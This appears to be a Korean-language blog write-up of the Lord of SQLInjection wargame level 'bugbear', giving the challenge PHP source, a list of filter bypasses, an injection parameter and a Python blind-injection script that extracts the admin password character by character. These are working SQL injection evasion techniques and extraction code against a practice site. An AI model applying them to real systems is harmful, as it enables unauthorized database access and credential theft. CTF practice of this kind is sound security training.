Wargame/LOS
LOS #13 bugbear
0xe82de_
2020. 10. 28. 22:58
728x90
728x90
728x90
Lord of SQLInjection
los.rubiya.kr
Source code
<?php
include "./config.php";
login_chk();
$db = dbconnect();
if(preg_match('/prob|_|\.|\(\)/i', $_GET[no])) exit("No Hack ~_~");
if(preg_match('/\'/i', $_GET[pw])) exit("HeHe");
if(preg_match('/\'|substr|ascii|=|or|and| |like|0x/i', $_GET[no])) exit("HeHe");
$query = "select id from prob_bugbear where id='guest' and pw='{$_GET[pw]}' and no={$_GET[no]}";
echo "<hr>query : <strong>{$query}</strong><hr><br>";
$result = @mysqli_fetch_array(mysqli_query($db,$query));
if($result['id']) echo "<h2>Hello {$result[id]}</h2>";
$_GET[pw] = addslashes($_GET[pw]);
$query = "select pw from prob_bugbear where id='admin' and pw='{$_GET[pw]}'";
$result = @mysqli_fetch_array(mysqli_query($db,$query));
if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("bugbear");
highlight_file(__FILE__);
?>
Query
select id from prob_bugbear where id='guest' and pw='52dc3991' and no=
Write-up
필터링되는 문자는 다음과 같다.
-
single quote > double quote로 우회
-
substr() > right(), left() 함수로 우회
-
= > in
-
or > %7C%7C
-
and > %26%26
-
white space > %0b
-
like > in
LOS #12 darkknight 문제와 거의 비슷한 문제이다. 필터링되는 문자들만 그에 맞게 바꿔주면 된다.
위 사진과 같이 필터링 문자들을 우회하고 length() 함수로 pw 값의 길이를 알아낼 수 있다.
Parameter
pw=1&no1%0b%7C%7Cleft(id,5)%0bin("admin")%0b%26%26%0blength(pw)%0bin("8")
쿼리문은 다음과 같다.
select id from prob_bugbear where id='guest' and pw='1' and no=2 ||left(id,5) in ("admin") && length(pw) in ("8")
Code
#!/usr/bin/py
#-*-coding:utf-8 -*-
import requests
pw=""
for i in range(1,9):
for j in range(48,128): # ascii code로 변환할 chr() 함수로 전달할 파라미터 값
try:
url="https://los.rubiya.kr/chall/bugbear_19ebf8c8106a5323825b5dfa1b07ac1f.php?pw=1&no=2%0b%7C%7C%0bleft(id,5)%0bin%0b(\"admin\")%0b%26%26%0bright(left(pw," + str(i) + "),1)%0bin%0b(\"" + chr(j) + "\")"
result = requests.post(url, cookies=(dict(PHPSESSID="세션값")))
except:
print("Error...")
continue
if 'Hello admin' in result.text:
pw = pw + chr(j)
print("pw : " + pw)
break
Success
728x90
728x90